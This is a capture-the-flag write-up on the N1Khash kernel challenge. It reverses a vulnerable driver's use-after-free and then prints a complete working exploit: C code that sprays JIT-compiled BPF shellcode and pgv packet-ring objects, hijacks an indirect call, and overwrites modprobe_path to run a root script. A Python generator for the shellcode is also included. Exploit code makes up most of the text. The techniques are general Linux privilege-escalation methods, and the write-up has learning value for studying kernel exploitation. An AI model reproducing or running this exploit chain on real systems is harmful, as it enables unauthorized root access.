I finally had time to reproduce the N1Khash challenge from N1CTF, which continues my kernel pwn practice.

Challenge overview

Protections

A kernel config file is provided. The relevant protection options are:

CONFIG_MEMCG=y
CONFIG_SLUB=y
CONFIG_SLAB_FREELIST_RANDOM=y
CONFIG_SLAB_FREELIST_HARDENED=y
CONFIG_HARDENED_USERCOPY=y
CONFIG_BINFMT_MISC=y
# CONFIG_CFI_CLANG is not set
# CONFIG_STATIC_USERMODEHELPER is not set

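Since CONFIG_STATIC_USERMODEHELPER is not set, overwriting modprobe_path is a viable way to escalate privileges.
The launch script is as follows: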

qemu-system-x86_64  \
-m 256M \
-cpu qemu64,+smap,+smep \
-kernel bzImage \
-append "console=ttyS0 quiet panic=-1 kaslr sysctl.kernel.dmesg_restrict=1 sysctl.kernel.kptr_restrict=2" \
-initrd rootfs.cpio \
-drive file=/flag,if=virtio,format=raw,readonly=on \
-nographic \
-no-reboot \
-monitor /dev/null

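As shown, SMAP, SMEP, and KASLR are all enabled.

Challenge logic

khash.ko is the vulnerable driver. The IDA decompilation quickly shows that the handler behind close() calls kfree without clearing the pointer afterwards, which gives a UAF.
The ioctl handler is considerably more complex.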

kh_init

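kh_init initializes the driver: it sets up some basic state, creates a workqueue with alloc_workqueue, and then calls misc_register to register a device named n1khash.

misc_register registers a miscellaneous device. Misc devices are a special kind of character device: they all share one major number (10) and differ only in their minor numbers. The misc subsystem registers that major as a character device once at startup; misc_register itself assigns the minor and creates the device node, which normally appears under /dev.

The kh_fops structure registers the file operations: open, release, and ioctl.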

kh_open

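kh_open allocates a kmalloc-256 object through __kmalloc_cache_noprof with the flags GFP_KERNEL | __GFP_ZERO. Because __GFP_ACCOUNT is not set, the object is not isolated in a kmalloc-cg cache. The pointer is then stored in file->private_data.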

kh_release

kh_release simply frees the object allocated in open, which leads to the UAF.

kh_ioctl

kh_ioctl is more complex. When cmd = 0x4010b110 it queues delayed work that later runs kh_do_job.

The user-supplied data for this cmd has the following layout:

struct kh_queue_req {
  uint64_t digest_ptr;
  uint32_t count;
  uint32_t delay_time;
};
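The command number can be cross-checked against this layout. The sketch below assumes the driver uses the standard Linux _IOC encoding (nr in bits 0-7, type in bits 8-15, size in bits 16-29, direction in bits 30-31); the helper name decode_ioctl and the struct format string are illustrative and not taken from the driver.

```python
import struct

# Direction values of the generic Linux _IOC encoding (as used on x86).
_IOC_DIRS = {0: "none", 1: "write", 2: "read", 3: "read|write"}


def decode_ioctl(cmd: int) -> dict:
    """Split an ioctl command number into its _IOC fields."""
    return {
        "dir": _IOC_DIRS[(cmd >> 30) & 0x3],
        "size": (cmd >> 16) & 0x3FFF,
        "type": (cmd >> 8) & 0xFF,
        "nr": cmd & 0xFF,
    }


# Assumed packing of struct kh_queue_req: digest_ptr, count, delay_time.
REQ_FORMAT = "<QII"

info = decode_ioctl(0x4010B110)
print(info)
print("request size:", struct.calcsize(REQ_FORMAT))
```

The decoded size field is 16 bytes with a write direction (user to kernel), which agrees with the 8 + 4 + 4 byte request structure above.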

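A workqueue is a mechanism built on kernel threads for processing work items. Work items are linked into a list, taken off one at a time, processed, and then removed from the list, which is queue-like behavior, hence the name.
A caller could of course implement the function and call it directly, create a new thread with kthread_create(), or defer the work with a timer via add_timer. A workqueue suits functions that are simple but contain delays. A large function that handles many tasks and has to run repeatedly can get its own kernel thread, and latency-sensitive work can use a timer.
Basic operations:
workqueue_test = alloc_workqueue("workqueue_test", 0, 0): create a workqueue
create_workqueue(name): legacy wrapper built on alloc_workqueue
INIT_WORK(&work_test, work_test_func): initialize a work item
queue_work(workqueue_test, &work_test): add the work item to the given workqueue

Here the work item is added to the delayed workqueue with queue_delayed_work_on.
In the Linux 6.12.55 source the function is defined as follows: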

/**
 * queue_delayed_work_on - queue work on specific CPU after delay
 * @cpu: CPU number to execute work on
 * @wq: workqueue to use
 * @dwork: work to queue
 * @delay: number of jiffies to wait before queueing
 *
 * Return: %false if @work was already on a queue, %true otherwise. If
 * @delay is zero and @dwork is idle, it will be scheduled for immediate
 * execution.
 */
bool queue_delayed_work_on(int cpu, struct workqueue_struct *wq,
			   struct delayed_work *dwork, unsigned long delay)
{
	struct work_struct *work = &dwork->work;
	bool ret = false;
	unsigned long irq_flags;

	/* read the comment in __queue_work() */
	local_irq_save(irq_flags);

	if (!test_and_set_bit(WORK_STRUCT_PENDING_BIT, work_data_bits(work)) &&
	    !clear_pending_if_disabled(work)) {
		__queue_delayed_work(cpu, wq, dwork, delay);
		ret = true;
	}

	local_irq_restore(irq_flags);
	return ret;
}
EXPORT_SYMBOL(queue_delayed_work_on);

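kh_do_job follows pointers read from the object and makes an indirect call through them (v15 and v16 in the decompilation).

So the basic idea is to submit a delayed work item through ioctl that will run kh_do_job. The function only runs after a delay (100 s). Within that window we can close the file to free the filp->private_data object and allocate another structure in its place to tamper with its contents.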

Vulnerability analysis

The release function has a UAF, and kh_do_job, which is queued from ioctl, makes an indirect call through a pointer.

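Exploitation

The exploit uses the pgv structure. Because the challenge enables KASLR, BPF JIT spraying is used to escalate privileges without a leak.

There is still a lot of the challenge logic that I have not reversed, so a leak path may well exist. For now I am following the reference write-up to learn the leakless ret2BPF technique.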

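ret2bpf reference 🔗
The challenge already provides a CFH (Control Flow Hijacking) primitive: the pointer used by call rbx lives in a kmalloc-256 object. Through the UAF, a pgv array (its size is arbitrary; nr_block=32 here) can reclaim that object and replace the pointer.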
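The choice of 32 blocks can be checked with a little arithmetic. The sketch below assumes that the pgv array is a plain kmalloc allocation of block_nr * sizeof(struct pgv) bytes, that struct pgv is a single 8-byte pointer on x86-64, and that the usual general-purpose kmalloc size classes apply; the helper name pgv_cache is illustrative.

```python
import bisect

# General-purpose kmalloc size classes (assumed typical SLUB configuration).
KMALLOC_SIZES = [8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192]

# Assumption: struct pgv holds a single `char *buffer`, 8 bytes on x86-64.
SIZEOF_PGV = 8


def pgv_cache(block_nr: int) -> int:
    """Return the kmalloc cache size that a pgv array of block_nr entries lands in."""
    need = block_nr * SIZEOF_PGV
    idx = bisect.bisect_left(KMALLOC_SIZES, need)
    if idx == len(KMALLOC_SIZES):
        raise ValueError("allocation too large for the listed caches")
    return KMALLOC_SIZES[idx]


for nr in (24, 32, 33):
    print(nr, "blocks -> kmalloc-%d" % pgv_cache(nr))
```

With 32 blocks the array needs exactly 256 bytes, so it competes for the same kmalloc-256 slots as the freed driver object; this is what PAGE_NUM (256 / 8) in the exploit expresses.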
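Spraying JIT-compiled BPF programs that carry the shellcode raises the hit rate, so the hijacked call can simply target 0xffffffffc1000000 - 0x800.
For how the shellcode works, see the ret2bpf link above. In short, it uses the rdmsr instruction to read the address of entry_SYSCALL_64, derives the addresses of other kernel symbols by adding or subtracting fixed offsets, and ends up performing copy_from_user(modprobe_path, buf, size). The shellcode is generated with the gen_sc.py script shown further below.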
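The offset arithmetic can be sketched in plain Python. The symbol addresses are the ones hard-coded in gen_sc.py; the helper names step and resolve, and the sample slide value, are illustrative. The sketch assumes that KASLR shifts kernel text and data by one common slide, so differences between symbols stay constant.

```python
ENTRY_SYSCALL_64 = 0xFFFFFFFF82800080
MODPROBE_PATH = 0xFFFFFFFF84194620
COPY_FROM_USER = 0xFFFFFFFF81B6FFA0
MSLEEP = 0xFFFFFFFF81271380

MASK64 = (1 << 64) - 1

off1 = ENTRY_SYSCALL_64 - MODPROBE_PATH
off2 = MODPROBE_PATH - COPY_FROM_USER
off3 = COPY_FROM_USER - MSLEEP


def step(reg: int, off: int) -> int:
    """Model `reg -= off` in 64-bit arithmetic, as the generated shellcode does."""
    # The shellcode builds |off| in a 32-bit register, so it must fit in 32 bits.
    assert abs(off) < (1 << 32)
    return (reg - off) & MASK64


def resolve(lstar: int) -> tuple:
    """Derive (modprobe_path, copy_from_user, msleep) from the MSR_LSTAR value."""
    modprobe = step(lstar, off1)
    cfu = step(modprobe, off2)
    msleep = step(cfu, off3)
    return modprobe, cfu, msleep


slide = 0x1E00000  # hypothetical KASLR slide, for illustration only
print([hex(a) for a in resolve(ENTRY_SYSCALL_64 + slide)])
```

Because only differences between symbols are used, the same shellcode works for any slide, which is why no leak is needed.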
The exploit is as follows:

#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>

#define SYSCHK(x)                     \
  ({                                  \
    typeof(x) __res = (x);            \
    if (__res == (typeof(x))-1)       \
      err(1, "SYSCHK(" #x ")");       \
    __res;                            \
  })

#define SUCCESS_MSG(msg) "\033[32m\033[1m[+] " msg "\033[0m"
#define INFO_MSG(msg) "\033[34m\033[1m[*] " msg "\033[0m"
#define ERROR_MSG(msg) "\033[31m\033[1m[x] " msg "\033[0m"

#define log_success(msg) puts(SUCCESS_MSG(msg))
#define log_info(msg) puts(INFO_MSG(msg))
#define log_error(msg) puts(ERROR_MSG(msg))

/* ========================= BPF JIT spray ========================= */
#include <linux/bpf_common.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <sys/socket.h>

struct sock_filter filter[0x1000];
char buf[0x1000];

void bpf_jit_spray(void) {
  /* Fixed user mapping that holds the new modprobe_path string; the
   * shellcode copies 0x30 bytes from 0xa00000 with copy_from_user(). */
  char *shellcode =
      mmap((void *)0xa00000, 0x2000, PROT_READ | PROT_WRITE | PROT_EXEC,
           MAP_PRIVATE | MAP_FIXED | MAP_ANON, -1, 0);
  if (shellcode == MAP_FAILED)
    err(1, "mmap");
  strcpy(shellcode, "/tmp/getshell");

  int stopfd[2];
  SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, stopfd));

  unsigned int prog_len = 0x900; // In current environment, the max instructions
                                 // in a program is near 0x900
  struct sock_filter table[] = {
      {.code = BPF_LD + BPF_K,
       .k = 0xb3909090}, // 0xb3909090 is NOP sled shellcode to make
                         // exploitation more reliable (b3 b8: mov bl, 0xb8)
      {.code = BPF_RET + BPF_K, .k = SECCOMP_RET_ALLOW}};

  for (unsigned int i = 0; i < prog_len; i++) {
    filter[i] = table[0];
  }

  filter[prog_len - 1] = table[1];
  int idx = prog_len - 2; /* sc.h fills filter[] backwards from here */

#include "sc.h"

  struct sock_fprog prog = {
      .len = prog_len,
      .filter = filter,
  };

  int fd[2];
  int fork_limit = 0x30;
  for (int k = 0; k < fork_limit; k++) {
    if (fork() == 0) {
      close(stopfd[1]); // use fork to bypass RLIMIT_NOFILE limit.
      for (int i = 0; i < 0x20; i++) {
        SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, fd));
        SYSCHK(setsockopt(fd[0], SOL_SOCKET, SO_ATTACH_FILTER, &prog,
                          sizeof(prog)));
      }
      write(stopfd[0], buf, 1); /* tell the parent this child is done */
      read(stopfd[0], buf, 1);  /* block so the filters stay attached */
      exit(0);
    }
  }
  /* Wait for all forks to finish spraying BPF code. A stream read may return
   * fewer bytes than requested, so collect the bytes one at a time. */
  for (int k = 0; k < fork_limit; k++)
    SYSCHK(read(stopfd[1], buf, 1));
}

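/* Returns non-zero once modprobe_path no longer starts with /sbin/modprobe. */
int check_modprobe(void) {
  char buf[0x100] = {0};
  int modprobe = SYSCHK(open("/proc/sys/kernel/modprobe", O_RDONLY));
  read(modprobe, buf, sizeof(buf) - 1); /* keep the trailing NUL intact */
  printf("modprobe: %20s\n", buf);
  close(modprobe);
  const char *old = "/sbin/modprobe";
  return strncmp(buf, old, strlen(old)) != 0;
}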
/* ========================= BPF JIT spray ========================= */

/* =========================== pgv spray =========================== */
#include <arpa/inet.h>
#include <net/ethernet.h>
#include <net/if.h>
#include <netpacket/packet.h>
#include <sched.h>
#include <sys/socket.h>

#ifndef TPACKET_V3
#define TPACKET_V3 2
#endif
int cmd_pipe_req[2], cmd_pipe_reply[2];
#define SPRAY_PG_VEC_NUM 20
#define PAGE_NUM (256 / 8) // modify this to alloc arbitrary size pgv
int pgfd[SPRAY_PG_VEC_NUM] = {};
void *pgaddr[SPRAY_PG_VEC_NUM] = {};

/* create an isolate namespace for pgv */
void unshare_setup(void) {
  char edit[0x100];
  int tmp_fd;

  unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

  tmp_fd = open("/proc/self/setgroups", O_WRONLY);
  write(tmp_fd, "deny", strlen("deny"));
  close(tmp_fd);

  tmp_fd = open("/proc/self/uid_map", O_WRONLY);
  snprintf(edit, sizeof(edit), "0 %d 1", getuid());
  write(tmp_fd, edit, strlen(edit));
  close(tmp_fd);

  tmp_fd = open("/proc/self/gid_map", O_WRONLY);
  snprintf(edit, sizeof(edit), "0 %d 1", getgid());
  write(tmp_fd, edit, strlen(edit));
  close(tmp_fd);
}

struct tpacket_req3 {
  unsigned int tp_block_size;     /* Minimal size of contiguous block */
  unsigned int tp_block_nr;       /* Number of blocks */
  unsigned int tp_frame_size;     /* Size of frame */
  unsigned int tp_frame_nr;       /* Total number of frames */
  unsigned int tp_retire_blk_tov; /* timeout in msecs */
  unsigned int tp_sizeof_priv;    /* offset to private data area */
  unsigned int tp_feature_req_word;
};

void packet_socket_rx_ring_init(int s, unsigned int block_size,
                                unsigned int frame_size, unsigned int block_nr,
                                unsigned int sizeof_priv,
                                unsigned int timeout) {
  int v = TPACKET_V3;
  SYSCHK(setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v)));

  struct tpacket_req3 req;
  memset(&req, 0, sizeof(req));
  req.tp_block_size = block_size;
  req.tp_frame_size = frame_size;
  req.tp_block_nr = block_nr;
  req.tp_frame_nr = (block_size * block_nr) / frame_size;
  req.tp_retire_blk_tov = timeout;
  req.tp_sizeof_priv = sizeof_priv;
  req.tp_feature_req_word = 0;

  /* Setting up the RX ring allocates the pgv array of block_nr entries. */
  SYSCHK(setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req)));
}

int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
                        unsigned int block_nr, unsigned int sizeof_priv,
                        int timeout) {
  int s = SYSCHK(socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)));
  packet_socket_rx_ring_init(s, block_size, frame_size, block_nr, sizeof_priv,
                             timeout);
  struct sockaddr_ll sa;
  memset(&sa, 0, sizeof(sa));
  sa.sll_family = PF_PACKET;
  sa.sll_protocol = htons(ETH_P_ALL);
  sa.sll_ifindex = if_nametoindex("lo");
  SYSCHK(bind(s, (struct sockaddr *)&sa, sizeof(sa)));
  return s;
}

char void_buf[1] = {0};
void spray_pgv_thread(void) {
  unshare_setup();
  /* Wait until the parent has freed the driver object. */
  read(cmd_pipe_req[0], void_buf, 1);
  for (int i = 0; i < SPRAY_PG_VEC_NUM; i++) {
    pgfd[i] = packet_socket_setup(0x1000, 2048, PAGE_NUM, 0, 10000);
  }

  for (int i = 0; i < SPRAY_PG_VEC_NUM; i++) {
    if (!pgfd[i])
      continue;
    pgaddr[i] = mmap(NULL, PAGE_NUM * 0x1000, PROT_READ | PROT_WRITE,
                     MAP_SHARED, pgfd[i], 0);
    if (pgaddr[i] == MAP_FAILED)
      continue;
    /* Write the call target at the start of every block page. */
    for (int j = 0; j < PAGE_NUM; j++) {
      unsigned long *pgv_buff =
          (unsigned long *)((char *)pgaddr[i] + j * 0x1000);
      pgv_buff[0] = 0xffffffffc1000000 - 0x800;
    }
  }
  write(cmd_pipe_reply[1], void_buf, 1);

  sleep(999);
  exit(0);
}
/* =========================== pgv spray =========================== */
#define DEV_PATH "/dev/n1khash"

#define VULN_CMD 0x4010B110

int dev_fd = 0;

struct kh_queue_req {
  uint64_t digest_ptr;
  uint32_t count;
  uint32_t delay_time;
};

void vuln(uint64_t digest_ptr, uint32_t count, uint32_t delay_time) {
  struct kh_queue_req req = {
      .digest_ptr = digest_ptr, .count = count, .delay_time = delay_time};
  SYSCHK(ioctl(dev_fd, VULN_CMD, &req));
}

#define ROOT_SCRIPT_PATH "/tmp/getshell"
char root_cmd[] = "#!/bin/sh\nchmod 777 /flag";
char flag[0x30];

int main(void) {
  SYSCHK(pipe(cmd_pipe_reply));
  SYSCHK(pipe(cmd_pipe_req));

  // bpf jit spray
  log_info("spraying bpf jit shellcode...");
  bpf_jit_spray();
  // pgv spray
  log_info("spraying pgv[32] struct...");
  if (fork() == 0)
    spray_pgv_thread();

  dev_fd = SYSCHK(open(DEV_PATH, O_RDWR));
  log_info("open " DEV_PATH " success!");

  /* Queue the delayed job, then free the object it still references. */
  vuln(0, 0x10, 0x1000);
  close(dev_fd);

  // reclaim obj with pgv
  log_info("reclaiming obj with pgv...");
  write(cmd_pipe_req[1], void_buf, 1);
  read(cmd_pipe_reply[0], void_buf, 1);
  log_info("reclaim obj done!");

  /* Poll once per second until the shellcode has rewritten modprobe_path. */
  while (!check_modprobe())
    sleep(1);

  log_success("successfully modified modprobe_path!");

  /* create fake modprobe_path file */
  int root_script_fd, flag_fd;
  root_script_fd = SYSCHK(open(ROOT_SCRIPT_PATH, O_RDWR | O_CREAT, 0755));
  write(root_script_fd, root_cmd, strlen(root_cmd));
  close(root_script_fd);
  system("chmod +x " ROOT_SCRIPT_PATH);
  /* trigger the fake modprobe_path */
  puts("[*] triggering fake modprobe_path...");

  system("echo -e '\\xff\\xff\\xff\\xff' > /tmp/fake");
  system("chmod +x /tmp/fake");
  system("/tmp/fake");
  /* read flag */
  memset(flag, 0, sizeof(flag));

  flag_fd = open("/flag", O_RDWR);
  if (flag_fd < 0) {
    log_error("open /flag failed!");
    perror("Error: ");
    return -1;
  }

  read(flag_fd, flag, sizeof(flag) - 1);
  printf("\033[32m\033[1m[+] Got flag: \033[0m%s\n", flag);
  return 0;
}

gen_sc.py

#!/usr/bin/env python3

from pwn import *
import struct

# Only the differences between these addresses are used by the shellcode.
entry_syscall = 0xffffffff82800080  # entry_SYSCALL_64
modprobe_path = 0xffffffff84194620
copy_from_user = 0xffffffff81b6ffa0
msleep = 0xffffffff81271380

off1 = entry_syscall - modprobe_path
off2 = modprobe_path - copy_from_user
off3 = copy_from_user - msleep


context.arch = 'amd64'


def load_reg(_reg, _val):
    # Emit `_reg -= _val`: build |_val| in esi one byte at a time (every
    # instruction stays within 3 bytes), then sub for a positive _val
    # or add for a negative one.
    ins = ["sub", "add"]
    return f'''
    xor esi,esi
    mov sil, {(abs(_val) >> 24) & 0xff}
    shl esi, 8
    mov sil, {(abs(_val) >> 16) & 0xff}
    shl esi, 8
    mov sil, {(abs(_val) >> 8) & 0xff}
    shl esi, 8
    mov sil, {(abs(_val)) & 0xff}
    {ins[_val < 0]} {_reg}, rsi
    '''


ASM = f"""
; do rdmsr(MSR_LSTAR) so EDX and EAX will contain address of entry_SYSCALL_64; ECX should be MSR_LSTAR ( 0xc0000082 )
xor edx, edx
mov cl, 0xc0
shl ecx, 24
mov cl, 0x82
rdmsr
; make rdx = entry_SYSCALL_64's address
mov cl, 32
shl rdx, cl
add rdx, rax
; entry_SYSCALL_64 - off1 = modprobe_path
; move modprobe_path to rdi ( 1st arg )
{load_reg('rdx', off1)}
mov rdi, rdx
; move copy_from_user to rax
{load_reg('rdx', off2)}
mov rax, rdx
; call copy_from_user(modprobe_path, user_buf, 0x30); user_buf = 0xa00000
xor esi, esi
mov sil, 0xa0
shl esi, 16
xor edx, edx
mov dl, 0x30
push rax
call rax
pop rax
; turn copy_from_user into msleep
{load_reg('rax', off3)}
; move 0x7000000 to rdi ( 1st arg )
xor edi,edi
mov dil,0x70
shl edi,20
call rax
"""
# msleep is better than jmp $+0


with open("sc.h", "w") as f:
    # Walk the instructions in reverse because sc.h fills filter[] from the
    # end of the program backwards (filter[idx--]).
    for a in ASM.strip().split("\n")[::-1]:
        a = a.strip()
        if a == '' or a[0] == ';':
            continue
        cur = asm(a)
        assert len(cur) <= 3
        # Pad to 3 bytes with NOPs and append 0x3c as the fourth byte.
        cur = hex(struct.unpack('<I', cur.ljust(3, b'\x90') + b'\x3c')[0])
        sc = "filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = " + cur + "};"
        print(sc)
        f.write(sc + "\n")
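The packing step at the end of gen_sc.py can be illustrated without pwntools. The sketch below rests on the assumption that the x86-64 JIT turns each BPF_LD + BPF_K instruction into mov eax, imm32 (opcode b8 followed by the 4-byte immediate); the helper names pack_insn and jit_bytes are illustrative.

```python
import struct


def pack_insn(code: bytes) -> int:
    """Pack one machine instruction (at most 3 bytes) into a 32-bit BPF immediate."""
    if len(code) > 3:
        raise ValueError("instruction longer than 3 bytes")
    # Pad with NOPs (0x90), then append 0x3c, the opcode of `cmp al, imm8`.
    return struct.unpack("<I", code.ljust(3, b"\x90") + b"\x3c")[0]


def jit_bytes(k: int) -> bytes:
    """Bytes assumed to be emitted by the JIT for one load: mov eax, imm32."""
    return b"\xb8" + struct.pack("<I", k)


rdmsr = bytes.fromhex("0f32")  # encoding of the rdmsr instruction
k = pack_insn(rdmsr)
stream = jit_bytes(k) + jit_bytes(k)

print(hex(k))
# Entering one byte into the stream skips the first b8 opcode, so the CPU
# decodes: rdmsr; nop; cmp al, 0xb8; rdmsr; nop; cmp al, <next byte>.
print(stream[1:].hex(" "))
```

The trailing 0x3c is what keeps execution aligned: as cmp al, imm8 it consumes the b8 opcode of the next JIT-emitted mov, so control falls straight into the next packed instruction. The NOP sled value 0xb3909090 works the same way, with b3 b8 decoding as mov bl, 0xb8.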

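The original blog mentions that after kernel 6.2 modprobe can no longer be triggered simply by executing an unknown binary, yet here executing one directly still seems to trigger it. I am not sure why; if you know, feel free to leave a comment :-).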

References